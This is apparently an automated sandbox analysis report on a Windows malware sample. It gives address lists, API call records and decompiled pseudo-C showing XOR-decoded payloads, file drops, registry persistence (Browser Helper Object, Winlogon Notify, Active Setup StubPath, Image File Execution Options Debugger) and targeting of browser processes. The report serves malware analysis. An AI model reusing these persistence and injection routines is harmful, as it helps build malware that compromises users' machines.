0x00404cc9
0x00404cc5
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x004049e3
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004049dd
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x0040464a
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x00404644
0x004044d6
0x004044d9
0x00000000
0x00000000
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00000000
0x00404302
0x00404307
0x0040430f
0x00404314
0x0040431a
0x0040431f
0x00404320
0x00404326
0x0040432b
0x00404336
0x0040433b
0x0040433d
0x004043b6
0x004043b6
0x004043bb
0x004043d4
0x004043d9
0x004043db
0x004043dd
0x004043df
0x004043e2
0x004043eb
0x00404402
0x00404408
0x00404408
0x004043e2
0x004043dd
0x0040440d
0x00404412
0x0040442b
0x00404430
0x00404432
0x00404434
0x00404436
0x00404439
0x00404454
0x0040445a
0x0040445a
0x00404439
0x00404434
0x00404461
0x00404469
0x00404472
0x00404477
0x0040447f
0x0040448b
0x0040448c
0x0040448d
0x0040448f
0x00404491
0x00404493
0x00404495
0x00404497
0x00404499
0x0040449b
0x0040449c
0x004044a1
0x004044a3
0x004044a8
0x004044a8
0x00000000
0x004044a8
0x0040433f
0x00404344
0x00404345
0x0040434b
0x00404350
0x00404358
0x0040435e
0x00404364
0x00404369
0x0040436b
0x0040437a
0x0040437a
0x0040437f
0x00404380
0x00404386
0x0040438c
0x00404392
0x00404398
0x0040439d
0x0040439f
0x00000000
0x00000000
0x004043a9
0x004043ae
0x004043b0
0x00000000
0x00000000
0x00000000
0x004043b0
0x00404371
0x00404376
0x00404378
0x00000000
0x00000000
0x00000000
0x00404378
0x004042fc
0x00404275
0x00404279
0x00000000
0x00404279
0x00403ff5
0x00403ffa
0x0040425a
0x0040425f
0x00000000
0x00000000
0x00404267
0x00000000
0x00404267
0x00404004
0x00404009
0x0040400b
0x0040400d
0x0040416b
0x0040416b
0x00404170
0x0040418f
0x00404194
0x00404196
0x0040419c
0x004041c8
0x004041cd
0x004041cf
0x004041d1
0x004041f9
0x004041fe
0x00404200
0x00404219
0x0040421e
0x00404220
0x00404220
0x00404226
0x00404226
0x00404231
0x00404236
0x0040423b
0x00404247
0x00404247
0x0040423b
0x00404253
0x00404253
0x00404196
0x00000000
0x00404170
0x0040401a
0x0040401f
0x00404023
0x00404025
0x0040405a
0x0040405a
0x0040405f
0x0040406a
0x00404074
0x00404074
0x00404077
0x0040407c
0x0040407c
0x0040407e
0x00000000
0x00000000
0x00404080
0x00404087
0x004040da
0x004040e3
0x00000000
0x004040e3
0x00404089
0x00404096
0x0040409b
0x0040409c
0x0040409e
0x004040a3
0x004040a5
0x004040b6
0x004040c4
0x004040c9
0x004040d0
0x004040d2
0x00000000
0x00000000
0x004040d4
0x004040d5
0x004040d8
0x00000000
0x00000000
0x00000000
0x004040d8
0x004040a7
0x004040ac
0x004040ad
0x004040b2
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040b4
0x004040eb
0x004040eb
0x004040ed
0x004040f2
0x004040f2
0x004040f4
0x00000000
0x00000000
0x004040ff
0x00404100
0x00404100
0x00404107
0x0040410c
0x0040410c
0x0040410c
0x0040410e
0x0040410e
0x00404110
0x00000000
0x00000000
0x0040411b
0x0040411c
0x0040411c
0x00404123
0x00404123
0x00404123
0x00404123
0x00404126
0x00404126
0x00404128
0x00404128
0x0040412a
0x00000000
0x00000000
0x00404138
0x00404144
0x00404145
0x00404145
0x0040414c
0x00404151
0x00404158
0x00404160
0x00404166
0x00404166
0x00000000
0x00404151
0x0040402d
0x00404036
0x0040403b
0x00404042
0x00404049
0x00404049
0x0040404b
0x00000000
0x00000000
0x00404055
0x00404057
0x00404057
0x00000000
0x0040427e
0x0040427e
0x0040427e
0x00403f79
0x00403f79
0x00403f7e
0x00403f86
0x00000000
0x00403f80
0x00403f80
0x00403f80
0x00403f83
0x00000000
0x00403f83
0x00403ec9
0x00403ec9
0x00403ece
0x00403ed6
0x00403ee2
0x00403ef3
0x00403f09
0x00403f1f
0x00403f35
0x00403f3a
0x00403f46
0x00403f4b
0x00403f51
0x00403f5d
0x00403f62
0x00403f63
0x00403f68
0x00403f6a
0x00403f6a
0x00403f70
0x00403f74
0x00000000
0x00403ed0
0x00403ed0
0x00403ed0
0x00403ed3
0x00000000
0x00403ed3
0x00403eb7
0x00403ebc
0x00403ec4
0x00000000
0x00403ebe
0x00403ebe
0x00403ec1
0x00000000
0x00403ec1

APIs

SetFilePointer.KERNEL32(?,000000F0,00000000,00000002), ref: 00403E69
ReadFile.KERNEL32(?,004120E0,00000010,?,00000000,?,000000F0,00000000,00000002), ref: 00403E86
CloseHandle.KERNEL32(?,?,004120E0,00000010,?,00000000,?,000000F0,00000000,00000002), ref: 00403E92

Part of subcall function 004010B2: wsprintfA.USER32 ref: 004010C5

Strings

.exe, xrefs: 00403EB2

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: File$CloseHandlePointerReadwsprintf
String ID: .exe
API String ID: 1577166569-4119554291
Opcode ID: ee625f3c8a8d9147f332500a7de8a333390072956b14930801bf0dc1e6ef7227
Instruction ID: 647d16fac30a5290989ad040a77d1bff97c5403f675f057a8e76d2fb7f2e3359
Opcode Fuzzy Hash: ee625f3c8a8d9147f332500a7de8a333390072956b14930801bf0dc1e6ef7227
Instruction Fuzzy Hash: A6F0823020434069D6319B24CC06B5B3959BB45724FA08B3BB1D0F51E1C7BC1994C65E

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.KERNEL32(00000000,00000020,00401F95,00000000,?,?,00403EF3,?,80000000,00000001,00000000,00000003,00000000,00000000,wininet.dll,iphlpapi.dll), ref: 00401009

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bfbca1a7c6641442546660a61b7a9356c2fae9436f0459e1fa0aacead7504433
Instruction ID: 33a13357a2b9b3ac3e6dc3489ca669c79409c2bef5ada4d1ab7c4672adc2931f
Opcode Fuzzy Hash: bfbca1a7c6641442546660a61b7a9356c2fae9436f0459e1fa0aacead7504433
Instruction Fuzzy Hash: B7A002741505286AED212B21AD0AF6A261AFB40704FD480F67504A44F1C5BD1921591C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404933 Relevance: 309.2, APIs: 140, Strings: 36, Instructions: 1235
stringfileregistryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00404933() {
				int _t254;
				signed char* _t255;
				void* _t256;
				void* _t258;
				void* _t263;
				void* _t264;
				void* _t265;
				void* _t269;
				void* _t270;
				void* _t271;
				CHAR* _t274;
				void* _t276;
				long _t277;
				CHAR* _t278;
				void* _t280;
				long _t281;
				CHAR* _t286;
				void* _t288;
				CHAR* _t289;
				void* _t291;
				char* _t301;
				void* _t302;
				signed char* _t307;
				void* _t310;
				void* _t311;
				void* _t317;
				void* _t318;
				void* _t323;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t336;
				void* _t338;
				void* _t343;
				long _t347;
				int _t348;
				void* _t354;
				void* _t356;
				void* _t359;
				void* _t366;
				void* _t368;
				void* _t370;
				void* _t375;
				void* _t378;
				void* _t380;
				void* _t383;
				void* _t385;
				void* _t389;
				void* _t394;
				void* _t396;
				void* _t398;
				struct _SECURITY_ATTRIBUTES* _t402;
				void* _t403;
				void* _t405;
				char* _t406;
				char* _t407;
				void* _t408;
				char* _t409;
				char* _t410;
				char* _t411;
				char* _t412;
				char* _t413;
				void* _t414;
				char* _t415;
				void* _t416;
				char* _t418;
				CHAR* _t419;
				void* _t423;
				void* _t425;
				int _t428;
				void* _t442;
				int _t443;
				void* _t446;
				CHAR* _t452;
				void* _t454;
				long _t455;
				void* _t460;
				void* _t468;
				void* _t469;
				signed char _t477;
				void* _t483;
				void* _t487;
				void* _t489;
				int _t490;
				void* _t493;
				signed char _t504;
				void* _t506;
				void* _t508;
				void* _t509;
				int* _t510;
				signed int* _t513;
				long _t523;
				int _t524;
				signed char _t534;
				CHAR* _t537;
				CHAR* _t538;
				CHAR* _t539;
				CHAR* _t540;
				CHAR* _t541;
				CHAR* _t542;
				CHAR* _t543;
				CHAR* _t544;
				CHAR* _t545;
				int* _t546;
				void** _t547;
				char* _t548;
				char* _t549;
				CHAR* _t550;
				void* _t553;
				char* _t554;
				char* _t556;
				char* _t557;
				char* _t558;
				int* _t559;
				CHAR* _t560;
				int _t561;
				void* _t562;
				signed int* _t564;
				char* _t565;
				int* _t569;
				int* _t570;
				void* _t571;
				int _t573;
				int _t574;
				void* _t575;
				signed int* _t599;
				int* _t600;
				signed char* _t601;
				signed int* _t603;
				char* _t605;
				signed char* _t606;
				void* _t607;
				signed int* _t608;
				void** _t609;
				void* _t611;
				void** _t612;
				void** _t613;
				char* _t614;
				CHAR* _t615;
				int* _t616;
				int* _t617;
				signed int* _t618;
				void* _t619;
				void* _t620;
				char* _t621;
				signed int* _t622;
				long _t623;
				struct _FILETIME* _t624;
				int* _t625;

				_t537 =  &(_t625[0x3cb]);
				_t254 = GetSystemDirectoryA(_t537, 0x104);
				_push( *0x412090);
				_push(0x41103e);
				_push(_t537);
				L00405E30();
				_push(_t254);
				L00405E30();
				_t255 = 0x407260;
				goto L1;
				L6:
				_t538 =  &(_t625[0x3cb]);
				SetFileAttributesA(_t538, 0x80);
				_t258 = CreateFileA(_t538, 0x40000000, 0, 0, 2, 0x80, 0);
				_t625[0x28] = _t258;
				__eflags = _t258;
				if(_t258 == 0) {
					L22:
					RegCloseKey(_t625[0x26]);
					RegDeleteKeyA(0x80000001,  &(_t625[0x40e]));
					_t263 = E004030DE( &(_t625[0x1ee]));
					_t625[0x26] = _t263;
					__eflags = _t263;
					if(_t263 == 0) {
						L43:
						_t264 = E004010B2();
						__eflags = _t264;
						_t573 = _t264;
						if(_t264 == 0) {
							_t573 = 0x42;
						}
						_t625[0x1ee] = _t573;
						_t265 = E004010B2();
						__eflags = _t265;
						_t574 = _t265;
						if(_t265 == 0) {
							_t574 = 0x4d;
						}
						_t625[0x162] = _t574;
						_push( *0x4120b0);
						_push( &(_t625[0x163]));
						L00405E20();
						_push( &(_t625[0x55a]));
						_push( &(_t625[0x1ac]));
						L00405E20();
						_t608 = _t625[5];
						_t269 = _t608 + _t623;
						while(1) {
							__eflags = _t608 - _t269;
							if(_t608 >= _t269) {
								break;
							}
							 *_t608 =  *_t608 ^ _t625[0x162] & 0x000000ff;
							_t608 =  &(_t608[0]);
							_t269 = _t625[5] + _t623;
						}
						_t539 =  &(_t625[0x517]);
						_t270 = ExpandEnvironmentStringsA("%AppData%\\", _t539, 0x104);
						__eflags = _t270;
						if(_t270 == 0) {
							L54:
							_t540 =  &(_t625[0x516]);
							_t271 = GetTempPathA(0x104, _t540);
							__eflags = _t271;
							if(_t271 != 0) {
								_t615 =  &(_t625[0x16a]);
								_t468 = GetTempFileNameA(_t540, "tmp", 0, _t615);
								__eflags = _t468;
								if(_t468 == 0) {
									goto L62;
								}
								_t469 = CreateFileA(_t615, 0x40000000, 0, 0, 2, 0x80, 0);
								_t625[0x28] = _t469;
								__eflags = _t469;
								if(_t469 == 0) {
									goto L62;
								}
								__eflags = _t469 + 1;
								if(_t469 + 1 == 0) {
									goto L62;
								}
								L59:
								WriteFile(_t625[0x2c], _t625[8], _t623,  &(_t625[0x28]), 0);
								CloseHandle(_t625[0x28]);
								CreateFileA( &(_t625[0x170]), 0x80000000, 1, 0, 3, 0, 0);
								_t616 =  &(_t625[0x1ee]);
								_t599 =  &(_t625[0x162]);
								_t569 =  &(_t625[0x278]);
								while(1) {
									__eflags = _t616 - _t569;
									if(_t616 >= _t569) {
										goto L62;
									}
									_t477 = _t625[0x1ee] & 0x000000ff ^  *_t599;
									_t599 =  &(_t599[0]);
									 *_t616 = _t477;
									_t616 =  &(_t616[0]);
								}
							}
							goto L62;
						}
						_t617 =  &(_t625[0x16a]);
						_push(_t617);
						_push(0);
						_push(0x411040);
						_push(_t539);
						L00405E90();
						__eflags = _t270;
						if(_t270 == 0) {
							goto L54;
						}
						_push(0);
						_push(0x80);
						_push(2);
						_push(0);
						_push(0);
						_push(0x40000000);
						_push(_t617);
						L00405DB0();
						_t625[0x28] = _t270;
						__eflags = _t270;
						if(_t270 == 0) {
							goto L54;
						}
						__eflags = _t270 + 1;
						if(_t270 + 1 != 0) {
							goto L59;
						}
						goto L54;
					} else {
						RegDeleteValueA(_t263, "SubshellState");
						RegCloseKey(_t625[0x26]);
						_t618 =  &(_t625[0x1ee]);
						_t600 =  &(_t625[0x162]);
						_t570 =  &(_t625[0x278]);
						while(1) {
							__eflags = _t618 - _t570;
							if(_t618 >= _t570) {
								break;
							}
							_t504 = _t625[0x1ee] & 0x000000ff ^  *_t618;
							_t618 =  &(_t618[0]);
							 *_t600 = _t504;
							_t600 =  &(_t600[0]);
						}
						_push( *0x4120b0);
						_t483 =  &(_t625[0x163]);
						_push(_t483);
						L00405E50();
						__eflags = _t483;
						if(_t483 != 0) {
							L29:
							_t560 =  &(_t625[0x16b]);
							SetFileAttributesA(_t560, 0x80);
							DeleteFileA(_t560);
							goto L43;
						}
						_push( &(_t625[0x55a]));
						_t487 =  &(_t625[0x1ac]);
						_push(_t487);
						L00405E50();
						__eflags = _t487;
						if(_t487 == 0) {
							_t489 = CreateFileA( &(_t625[0x170]), 0x80000000, 1, 0, 3, 0, 0);
							_t625[0x28] = _t489;
							__eflags = _t489;
							if(_t489 == 0) {
								goto L29;
							}
							__eflags = _t489 - 0xffffffff;
							if(_t489 == 0xffffffff) {
								goto L29;
							}
							_t490 = GetFileSize(_t489, 0);
							_t625[0x1d] = _t490;
							__eflags = _t490 - _t623;
							if(_t490 == _t623) {
								_t493 = E00401000(_t623);
								_t619 = _t493;
								ReadFile(_t625[0x2c], _t493, _t623,  &(_t625[0x28]), 0);
								_t561 = _t625[0x1d];
								_t601 = _t619;
								_t606 = _t625[5];
								__eflags = _t619 - _t619 + _t561;
								while(__eflags < 0) {
									_t571 =  *_t601 & 0x000000ff;
									__eflags = _t625[0x162] - ( *_t606 & 0x000000ff);
									if(__eflags == 0) {
										__eflags = _t571;
									}
									if(__eflags == 0) {
										_t601 =  &(_t601[1]);
										_t606 =  &(_t606[1]);
										__eflags = _t601 - _t619 + _t561;
										continue;
									} else {
										E00401029(_t619);
										goto L33;
									}
								}
								E00401029(_t619);
								L62:
								E00401029(_t625[5]);
								_t541 =  &(_t625[0x387]);
								_t274 = GetSystemDirectoryA(_t541, 0x104);
								_push(0x80);
								_push( *0x4120c0);
								_push(0x41103e);
								_push(_t541);
								L00405E30();
								L00405E30();
								SetFileAttributesA(_t274, _t274);
								_t276 = CreateFileA(_t541, 0x40000000, 0, 0, 2, 0x80, 0);
								_t625[0x28] = _t276;
								__eflags = _t276;
								if(_t276 == 0) {
									L69:
									_t277 = GetLastError();
									__eflags = _t277 - 0x20;
									if(_t277 != 0x20) {
										_t542 =  &(_t625[0x387]);
										_t278 = ExpandEnvironmentStringsA("%AppData%\\", _t542, 0x104);
										_push(0x80);
										_push( *0x4120c0);
										L00405E30();
										SetFileAttributesA(_t278, _t542);
										_t280 = CreateFileA(_t542, 0x40000000, 0, 0, 2, 0x80, 0);
										_t625[0x28] = _t280;
										__eflags = _t280;
										if(_t280 == 0) {
											L73:
											_t281 = GetLastError();
											__eflags = _t281 - 0x20;
											if(_t281 == 0x20) {
												goto L70;
											}
											_t452 = GetTempPathA(0x104, _t542);
											_push(0x80);
											_push( *0x4120c0);
											L00405E30();
											SetFileAttributesA(_t452, _t542);
											_t454 = CreateFileA(_t542, 0x40000000, 0, 0, 2, 0x80, 0);
											_t625[0x28] = _t454;
											__eflags = _t454;
											if(_t454 == 0) {
												L76:
												_t455 = GetLastError();
												__eflags = _t455 - 0x20;
												if(_t455 == 0x20) {
													goto L70;
												}
												L79:
												_t543 =  &(_t625[0x343]);
												_t286 = ExpandEnvironmentStringsA("%AppData%\\", _t543, 0x104);
												_push(0x80);
												_push( *0x4120d0);
												L00405E30();
												SetFileAttributesA(_t286, _t543);
												_t288 = CreateFileA(_t543, 0x40000000, 0, 0, 2, 0x80, 0);
												_t625[0x28] = _t288;
												__eflags = _t288;
												_t575 = _t288;
												if(_t288 == 0) {
													L81:
													_t544 =  &(_t625[0x342]);
													_t289 = GetTempPathA(0x104, _t544);
													_push(0x80);
													_push( *0x4120d0);
													L00405E30();
													SetFileAttributesA(_t289, _t544);
													_t291 = CreateFileA(_t544, 0x40000000, 0, 0, 2, 0x80, 0);
													_t625[0x28] = _t291;
													__eflags = _t291;
													_t575 = _t291;
													if(_t291 == 0) {
														L84:
														_t625[0x342] = 0;
														L85:
														__eflags = _t625[0x342];
														if(_t625[0x342] != 0) {
															CreateFileA( &(_t625[0x348]), 0x80000000, 1, 0, 3, 0, 0);
														}
														_t545 =  &(_t625[0x2b]);
														GetSystemDirectoryA(_t545, 0x104);
														_push(0x41103e);
														_push(_t545);
														L00405E30();
														E004012C2(_t545);
														ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t545, 0x104);
														E004012C2(_t545);
														ExpandEnvironmentStringsA("%AppData%\\", _t545, 0x104);
														E004012C2(_t545);
														_t301 = 0x407220;
														while(1) {
															__eflags = _t301 - 0x40724d;
															if(_t301 >= 0x40724d) {
																break;
															}
															 *_t301 =  *_t301 ^ 0x000000d4;
															_t301 =  &(_t301[1]);
														}
														_t302 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t625[0x26]));
														__eflags = _t302;
														if(_t302 == 0) {
															L92:
															__eflags = _t625[0xb];
															if(_t625[0xb] == 0) {
																_t558 =  &(_t625[0x55a]);
																_t442 = E00401251(_t625[0x26]);
																_push(_t558);
																L00405E40();
																_t443 = _t442 + 1;
																__eflags = _t443;
																RegSetValueExA(_t625[0x2b],  *0x4120b0, 0, 1, _t558, _t443);
															}
															RegDeleteValueA(_t625[0x27], "winrnt.exe");
															RegCloseKey(_t625[0x26]);
															L95:
															__eflags =  *0x412100 - 2;
															if( *0x412100 != 2) {
																L135:
																CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t625[0x27])));
																_t307 = 0x407000;
																while(1) {
																	__eflags = _t307 - 0x407060;
																	if(_t307 >= 0x407060) {
																		break;
																	}
																	 *_t307 =  *_t307 ^ 0x000000d4;
																	_t307 =  &(_t307[1]);
																}
																_t625[0xc] = 0;
																while(1) {
																	E004011CF(0x80000002, 0x407000);
																	__eflags = _t625[0xc] - 9;
																	if(_t625[0xc] <= 9) {
																		goto L174;
																	}
																	_t625[0x16] = 0;
																	_t625[0x17] = 0;
																	_t366 = E004025C3();
																	__eflags = _t366;
																	if(_t366 != 0) {
																		L171:
																		 *_t625 = 0;
																		L175:
																		_t625[0xd] = 0x3b;
																		do {
																			__eflags = _t625[0x342];
																			if(_t625[0x342] != 0) {
																				_push(0);
																				_push("opera.exe");
																				_push("seamonkey.exe");
																				_push("mozilla.exe");
																				_push("firefox.exe");
																				_push("iexplore.exe");
																				_push("explorer.exe");
																				E0040318D( &(_t625[0x349]));
																				_t625 =  &(_t625[8]);
																			}
																			__eflags = _t625[0xa];
																			if(_t625[0xa] != 0) {
																				_t549 =  &(_t625[0x3cb]);
																				SetFileAttributesA(_t549, 0x21);
																				_t343 = RegCreateKeyA(0x80000002,  &(_t625[0x40f]),  &(_t625[0x26]));
																				__eflags = _t343;
																				if(_t343 == 0) {
																					E00401251(_t625[0x26]);
																					_t625[0x27] = 1;
																					_t347 = RegSetValueExA(_t625[0x2b], "IsInstalled", 0, 4,  &(_t625[0x28]), 4);
																					_push(_t549);
																					L00405E40();
																					_t348 = _t347 + 1;
																					__eflags = _t348;
																					RegSetValueExA(_t625[0x2b], "StubPath", 0, 1, _t549, _t348);
																					RegCloseKey(_t625[0x26]);
																				}
																			}
																			__eflags = _t625[0xb];
																			_t609 =  &(_t625[0x26]);
																			if(_t625[0xb] == 0) {
																				_t310 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t609);
																				__eflags = _t310;
																				if(_t310 == 0) {
																					L186:
																					_t546 =  &(_t625[0x55a]);
																					_push(_t546);
																					L00405E40();
																					_t311 = _t310 + 1;
																					__eflags = _t311;
																					_push(_t311);
																					_push(_t546);
																					_push(1);
																					_push(0);
																					_push( *0x4120b0);
																					goto L187;
																				}
																				_t310 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t609);
																				__eflags = _t310;
																				if(_t310 != 0) {
																					goto L188;
																				}
																				goto L186;
																			} else {
																				_t550 =  &(_t625[0x48f]);
																				SetFileAttributesA(_t550, 0x21);
																				_t317 = RegCreateKeyA(0x80000002, 0x408720, _t609);
																				__eflags = _t317;
																				if(_t317 != 0) {
																					L188:
																					__eflags = _t625[9];
																					if(_t625[9] == 0) {
																						goto L198;
																					}
																					_t547 =  &(_t625[0x27]);
																					_t318 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t547, 0);
																					__eflags = _t318;
																					if(_t318 == 0) {
																						L191:
																						RegSetValueExA(_t625[0x2b], "SubshellState", 0, 3,  &(_t625[0x1ef]), 0x22a);
																						RegCloseKey(_t625[0x26]);
																						L192:
																						_t548 =  &(_t625[0x387]);
																						SetFileAttributesA(_t548, 0x21);
																						__eflags =  *0x412100 - 2;
																						_t612 =  &(_t625[0x26]);
																						if( *0x412100 != 2) {
																							_t323 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t612);
																							__eflags = _t323;
																							if(_t323 != 0) {
																								goto L198;
																							}
																							_push(_t548);
																							L00405E40();
																							RegSetValueExA(_t625[0x2b], 0, 0, 1, _t548, _t323 + 1);
																							RegSetValueExA(_t625[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																							RegCloseKey(_t625[0x26]);
																							_t328 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t612);
																							__eflags = _t328;
																							if(_t328 != 0) {
																								goto L198;
																							}
																							L197:
																							RegCloseKey(_t625[0x26]);
																							goto L198;
																						}
																						_t330 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t612);
																						__eflags = _t330;
																						if(_t330 != 0) {
																							goto L198;
																						}
																						_t332 = E00401251(_t625[0x26]);
																						_push(_t548);
																						L00405E40();
																						RegSetValueExA(_t625[0x2b], "DLLName", 0, 1, _t548, _t332 + 1);
																						RegSetValueExA(_t625[0x2b], "Startup", 0, 1, "Startup", 8);
																						goto L197;
																					}
																					_t336 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t547, 0);
																					__eflags = _t336;
																					if(_t336 != 0) {
																						goto L192;
																					}
																					goto L191;
																				}
																				_t338 = E00401251(_t625[0x26]);
																				_push(_t550);
																				L00405E40();
																				_push(_t338 + 1);
																				_push(_t550);
																				_push(1);
																				_push(0);
																				_push("Debugger");
																				L187:
																				RegSetValueExA(_t625[0x2b], ??, ??, ??, ??, ??);
																				RegCloseKey(_t625[0x26]);
																				goto L188;
																			}
																			L198:
																			SetFileAttributesA( &(_t625[0x55b]), 0x21);
																			Sleep(0x3e8);
																			_t241 =  &(_t625[0xd]);
																			 *_t241 = _t625[0xd] - 1;
																			__eflags =  *_t241;
																		} while ( *_t241 >= 0);
																		_t354 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t625[0x12]), 0);
																		__eflags = _t354;
																		if(_t354 == 0) {
																			_t625[0x10] = 4;
																			_t554 =  &(_t625[0x10]);
																			_t356 = RegQueryValueExA(_t625[0x16], "g00d d0gg", 0, 0, _t554,  &(_t625[0x10]));
																			__eflags = _t356;
																			if(_t356 == 0) {
																				_t359 = _t625[0xf] - 1;
																				__eflags = _t359;
																				_t625[0xf] = _t359;
																				if(_t359 == 0) {
																					RegDeleteValueA(_t625[0x12], "g00d d0gg");
																					Sleep(0x1388);
																					__eflags =  *0x412100 - 2;
																					if( *0x412100 != 2) {
